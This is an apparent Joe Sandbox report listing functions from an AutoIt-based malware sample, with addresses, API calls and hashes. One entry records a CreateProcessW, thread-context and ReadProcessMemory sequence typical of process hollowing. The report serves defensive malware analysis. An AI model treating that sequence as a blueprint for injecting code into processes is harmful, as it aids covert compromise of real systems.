                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: f805a7f2c3248ee42d96026e94c54d855e2e68b034ab76493f843757350de0b4
                                                            • Instruction ID: 6bad54295b5420c8627907ea8d691c587d42845911921be21cbc199a00b2c4c1
                                                            • Opcode Fuzzy Hash: f805a7f2c3248ee42d96026e94c54d855e2e68b034ab76493f843757350de0b4
                                                            • Instruction Fuzzy Hash: 6401F574248308BEF7280E24CC8AF667BDDEB02778F108319BAE55A1E0C7B01E458B10
                                                            Function 001C0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001C594C: __FF_MSGBANNER.LIBCMT ref: 001C5963
                                                              • Part of subcall function 001C594C: __NMSG_WRITE.LIBCMT ref: 001C596A
                                                              • Part of subcall function 001C594C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,001C1013,?), ref: 001C598F
                                                            • std::exception::exception.LIBCMT ref: 001C102C
                                                            • __CxxThrowException@8.LIBCMT ref: 001C1041
                                                              • Part of subcall function 001C87DB: RaiseException.KERNEL32(?,?,?,0025BAF8,00000000,?,?,?,?,001C1046,?,0025BAF8,?,00000001), ref: 001C8830
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 0c7141c1014db5b3767f930b47ca82520b065c561768099fc08c805476c7d203
                                                            • Instruction ID: 739282cfb5327a94835a3054c2802e8a7b7492e33219974adbae13af94bd9b64
                                                            • Opcode Fuzzy Hash: 0c7141c1014db5b3767f930b47ca82520b065c561768099fc08c805476c7d203
                                                            • Instruction Fuzzy Hash: F5F0D17554021DB6CB21AA98EC05FDE7BA89F31350F20042EFC04A2182EBB0CAA482E1
                                                            Function 001C582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __lock_file_memset
                                                            • String ID:
                                                            • API String ID: 26237723-0
                                                            • Opcode ID: 8c062ca2d69dc73d3b906b1cb7c4f10d21ad6dacad7fed2ca318f0c807a4d22a
                                                            • Instruction ID: d36d7262ae028f03c25fdd4642cb7d54568a557901415c5c72c2ea1a409e689f
                                                            • Opcode Fuzzy Hash: 8c062ca2d69dc73d3b906b1cb7c4f10d21ad6dacad7fed2ca318f0c807a4d22a
                                                            • Instruction Fuzzy Hash: DB014871800615EBCF12AF6A8C05F9E7B62AF71360F15821DF8145A161DB31DA61DB91
                                                            Function 001C55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001C8D68: __getptd_noexit.LIBCMT ref: 001C8D68
                                                            • __lock_file.LIBCMT ref: 001C561B
                                                              • Part of subcall function 001C6E4E: __lock.LIBCMT ref: 001C6E71
                                                            • __fclose_nolock.LIBCMT ref: 001C5626
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 7f6918bd09f5fa15e68481fe061ccb23fca648d1fcd290a176a0864997d4573a
                                                            • Instruction ID: 9311e41f4ac4e7b79047c1b9160265dd83d08facbfdf36e4ce05d2f875e809b7
                                                            • Opcode Fuzzy Hash: 7f6918bd09f5fa15e68481fe061ccb23fca648d1fcd290a176a0864997d4573a
                                                            • Instruction Fuzzy Hash: EDF0B471800A249AD721AF798802F6E77E26FB1334F55820DE415AB1C1CF7CED819B59
                                                            Function 034D129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 034D1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 034D1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 034D1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                            • Instruction ID: c6af9f310c76e587420ef97ce64f857ab11d21d22f3edc4dbfc91091bc368b59
                                                            • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                            • Instruction Fuzzy Hash: CC12BE24E24658C6EB24DF64D8507DEB232EF68300F1094E9D10DEB7A5E77A4E81CF5A
                                                            Function 001B2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e41390b78c3cf33296023baaa85187e04e7401e2452f1c6efa360fdc30e93bd
                                                            • Instruction ID: 22b719d6af392daf98af35e277f01ecbf0e342245ed36185d17a7b85f119f4f8
                                                            • Opcode Fuzzy Hash: 0e41390b78c3cf33296023baaa85187e04e7401e2452f1c6efa360fdc30e93bd
                                                            • Instruction Fuzzy Hash: 0B518435704604AFCF14EB68C991FBE77A6AFA5354F158168F906AB392CB30ED04CB51
                                                            Function 001A766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 464124430e8de5960c13c3c2f65887e6ee4843d4792a7d1da34d152b5713a97e
                                                            • Instruction ID: b353606b9164879b6409d0e618912ced09e43e5d1a460eb59a65c13392021d0b
                                                            • Opcode Fuzzy Hash: 464124430e8de5960c13c3c2f65887e6ee4843d4792a7d1da34d152b5713a97e
                                                            • Instruction Fuzzy Hash: 6B31C37D608A02DFD7289F18C894A26F7E0FF1A310715C56DE88A8B3A5E730D881CB84
                                                            Function 001A5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 001A5CF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 87dec76dd0e5f11705b0b1a0d7b045dfd5a997e0004470bcd54e3a29cc633ec0
                                                            • Instruction ID: 322858d5d8bfd4380bf1c12dc6f41af9a91c5a5be6478f8b3cecc7dd920c5093
                                                            • Opcode Fuzzy Hash: 87dec76dd0e5f11705b0b1a0d7b045dfd5a997e0004470bcd54e3a29cc633ec0
                                                            • Instruction Fuzzy Hash: 8831AD35A04B09AFCB18DF6DC484AADB7B6FF48320F148629E81993708D730BD60DB90
                                                            Function 001E00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 9dc1c9ad7ea69bcf59226d23bce1eaffe2458a5b208392cf54a012590f8bb6df
                                                            • Instruction ID: 85a28187bf201485ae6fd4f722eacd6f326a3d0aa60d0cdd5a2246ce7bfa5efa
                                                            • Opcode Fuzzy Hash: 9dc1c9ad7ea69bcf59226d23bce1eaffe2458a5b208392cf54a012590f8bb6df
                                                            • Instruction Fuzzy Hash: 73412A78508751DFDB25DF54C484B1ABBE0BF5A318F1988ACE9894B362C372EC85CB52
                                                            Function 001A79AB Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction ID: 943665ec922f98a6f42233d532ef81b7371dddb76a734c002eab5ba5d51f2f42
                                                            • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction Fuzzy Hash: 3911E136208205AFD715DF28D881C6EB7A8EF46364728851EF815CB2E1DB32ED118BD0
                                                            Function 001A4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A4D13: FreeLibrary.KERNEL32(00000000,?), ref: 001A4D4D
                                                              • Part of subcall function 001C548B: __wfsopen.LIBCMT ref: 001C5496
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001A4F6F
                                                              • Part of subcall function 001A4CC8: FreeLibrary.KERNEL32(00000000), ref: 001A4D02
                                                              • Part of subcall function 001A4DD0: _memmove.LIBCMT ref: 001A4E1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: 8e53922c7563eedda7b74e8b7b607fd5358dbc14aca526148877f8c9c3781ecc
                                                            • Instruction ID: eb4bfa3a67c9cf136c41c0c2131147fe7a578aca7753e22240cf524eb4f60958
                                                            • Opcode Fuzzy Hash: 8e53922c7563eedda7b74e8b7b607fd5358dbc14aca526148877f8c9c3781ecc
                                                            • Instruction Fuzzy Hash: 7911E735600705AFCF14AFB4DD02FAE77A59F95710F108439F941A62C1DBF19A159B60
                                                            Function 001E01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 115e426fa7fd647d654a9ef9787f2cb8cfa8db286e9989df8cdd7098940e7c2d
                                                            • Instruction ID: 118ca14ba6f617f2ca391a51215946aaa6d0aac26efd1a7f51858ac4885df8d2
                                                            • Opcode Fuzzy Hash: 115e426fa7fd647d654a9ef9787f2cb8cfa8db286e9989df8cdd7098940e7c2d
                                                            • Instruction Fuzzy Hash: 7E2122B8508341DFCB24DF54C884B1ABBE0BF8A314F05896CF98A47722D731E899CB52
                                                            Function 001A5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,001A5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 001A5D76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 27802188862ed485545adbba78d07d1cfd1b9dd4b2e651514c478980f6e34ff3
                                                            • Instruction ID: 90377411ce5895e266304a97d78da8f970045fb05bac6cd86a628dfbf3a8cac0
                                                            • Opcode Fuzzy Hash: 27802188862ed485545adbba78d07d1cfd1b9dd4b2e651514c478980f6e34ff3
                                                            • Instruction Fuzzy Hash: A9113A39208B019FD3308F55C488B66B7FAEF46764F10C92EE5AA86A50D7B0E945CB60
                                                            Function 001C4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 001C4AD6
                                                              • Part of subcall function 001C8D68: __getptd_noexit.LIBCMT ref: 001C8D68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 6d38c5d86aa2593521dba9b5a4441cebb8b525e128e59ecb86ce20442c24f41e
                                                            • Instruction ID: 2b7b3c31d5095556fdb1c1b76015642224dc46726ee5d0711727a09420c41557
                                                            • Opcode Fuzzy Hash: 6d38c5d86aa2593521dba9b5a4441cebb8b525e128e59ecb86ce20442c24f41e
                                                            • Instruction Fuzzy Hash: EBF0AF31944219ABDF61AFA48C06BAE76A1AF30329F04851CF824AB1D1CB78CE51DF55
                                                            Function 001A4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,002662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001A4FDE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: e8c4e96de4c8983c99555fb77f7dca729f56ffb1fdff7e89fb74510b6905546f
                                                            • Instruction ID: eb88b30db46ab6f9b9daba47b999539535deb7f074f1b647c1805f8b8b3ba632
                                                            • Opcode Fuzzy Hash: e8c4e96de4c8983c99555fb77f7dca729f56ffb1fdff7e89fb74510b6905546f
                                                            • Instruction Fuzzy Hash: 1CF06575105711CFC7349F68E494822BBF1BF553293219A3EE5D782610C7B1A854DF40
                                                            Function 001C09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001C09F4
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 762cd7327ac4ddd1413fe905db07ce367705f567c54e21cc1481a32c8e61faf0
                                                            • Instruction ID: 0903f80b444437697e605661ae64f0aa77147b09ed102f581de149b53c52d418
                                                            • Opcode Fuzzy Hash: 762cd7327ac4ddd1413fe905db07ce367705f567c54e21cc1481a32c8e61faf0
                                                            • Instruction Fuzzy Hash: 6CE0863690422867C720D6989C05FFA77ADDF896A0F0401B6FC4CD7248DA609D818690
                                                            Function 00209129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction ID: 87ba2f93792d9d68b471bd5c2f6305ffd32b362b75bb0d53fd8362f1d78fe30a
                                                            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction Fuzzy Hash: DCE092B0614B019FDB348E24D850BE3B3E1AB16315F00091CF29B83342EB62B8818759
                                                            Function 001A5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,001DE16B,?,?,00000000), ref: 001A5DBF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 785f639a59c1d77a58604726d03a67f3be28d7ae105572ad71668e9ea0bb3811
                                                            • Instruction ID: 39639f52ff83133a91d9ac8e10e2853e088d884ebc19e981f23f57173274b70e
                                                            • Opcode Fuzzy Hash: 785f639a59c1d77a58604726d03a67f3be28d7ae105572ad71668e9ea0bb3811
                                                            • Instruction Fuzzy Hash: C9D0C77564020CBFE710DB80DC46FA9777CD705710F500194FD0456290D6B27D508795
                                                            Function 001C548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
